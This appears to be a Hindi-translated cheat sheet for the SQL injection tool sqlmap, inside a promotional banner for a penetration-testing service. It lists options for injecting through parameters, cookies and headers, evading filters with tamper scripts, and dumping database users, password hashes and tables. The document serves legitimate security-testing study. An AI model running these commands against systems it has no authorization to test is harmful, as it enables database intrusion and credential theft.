अपने वेब ऐप्स, नेटवर्क और क्लाउड पर एक हैकर का दृष्टिकोण प्राप्त करें
महत्वपूर्ण, शोषण योग्य कमजोरियों को खोजें और रिपोर्ट करें जिनका वास्तविक व्यापार पर प्रभाव है। हमारे 20+ कस्टम टूल का उपयोग करें ताकि हमले की सतह का मानचित्रण कर सकें, सुरक्षा मुद्दों को खोज सकें जो आपको विशेषाधिकार बढ़ाने की अनुमति देते हैं, और आवश्यक सबूत इकट्ठा करने के लिए स्वचालित शोषण का उपयोग करें, जिससे आपका कठिन काम प्रभावशाली रिपोर्टों में बदल जाए।
SQLmap के लिए बुनियादी तर्क
सामान्य
-u"<URL>"-p"<PARAM TO TEST>"--user-agent=SQLMAP--random-agent--threads=10--risk=3#MAX--level=5#MAX--dbms="<KNOWN DB TECH>"--os="<OS>"--technique="UB"#Use only techniques UNION and BLIND in that order (default "BEUSTQ")--batch#Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers--auth-type="<AUTH>"#HTTP authentication type (Basic, Digest, NTLM or PKI)--auth-cred="<AUTH>"#HTTP authentication credentials (name:password)--proxy=http://127.0.0.1:8080--union-char"GsFRts2"#Help sqlmap identify union SQLi techniques with a weird union char
जानकारी प्राप्त करें
आंतरिक
--current-user#Get current user--is-dba#Check if current user is Admin--hostname#Get hostname--users#Get usernames od DB--passwords#Get passwords of users in DB--privileges#Get privileges
DB डेटा
--all#Retrieve everything--dump#Dump DBMS database table entries--dbs#Names of the available databases--tables#Tables of a database ( -D <DB NAME> )--columns#Columns of a table ( -D <DB NAME> -T <TABLE NAME> )-D<DBNAME>-T<TABLENAME>-C<COLUMNNAME>#Dump column
Using SQLMapping यह एक व्यावहारिक उपकरण है जो कमांड उत्पन्न करता है और SQLMap के लिए एक संपूर्ण अवलोकन प्रदान करता है, दोनों बुनियादी और उन्नत। इसमें ToolTips शामिल हैं जो उपकरण के प्रत्येक पहलू को समझाते हैं, हर विकल्प का विवरण देते हैं ताकि आप इसे कुशलता और प्रभावी ढंग से उपयोग करना सीख सकें।
#Inside cookiesqlmap-u"http://example.com"--cookie"mycookies=*"#Inside some headersqlmap-u"http://example.com"--headers="x-forwarded-for:127.0.0.1*"sqlmap-u"http://example.com"--headers="referer:*"#PUT Methodsqlmap--method=PUT-u"http://example.com"--headers="referer:*"#The injection is located at the '*'
सफल इंजेक्शन होने पर स्ट्रिंग इंगित करें
--string="string_showed_when_TRUE"
Eval
Sqlmap-e या --eval का उपयोग करने की अनुमति देता है ताकि प्रत्येक payload को कुछ python oneliner के साथ भेजने से पहले संसाधित किया जा सके। यह payload को भेजने से पहले कस्टम तरीकों से संसाधित करना बहुत आसान और तेज़ बनाता है। निम्नलिखित उदाहरण में flask cookie sessionको भेजने से पहले ज्ञात गुप्त के साथ flask द्वारा हस्ताक्षरित किया गया है:
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap-rr.txt-pid--not-stringridiculous--batch
--tamper=name_of_the_tamper#In kali you can see all the tampers in /usr/share/sqlmap/tamper
अपने वेब ऐप्स, नेटवर्क और क्लाउड पर एक हैकर का दृष्टिकोण प्राप्त करें
महत्वपूर्ण, शोषण योग्य कमजोरियों को खोजें और रिपोर्ट करें जिनका वास्तविक व्यावसायिक प्रभाव है। हमारे 20+ कस्टम टूल का उपयोग करके हमले की सतह का मानचित्रण करें, सुरक्षा मुद्दों को खोजें जो आपको विशेषाधिकार बढ़ाने की अनुमति देते हैं, और आवश्यक सबूत इकट्ठा करने के लिए स्वचालित शोषण का उपयोग करें, जिससे आपका कठिन काम प्रभावशाली रिपोर्टों में बदल जाए।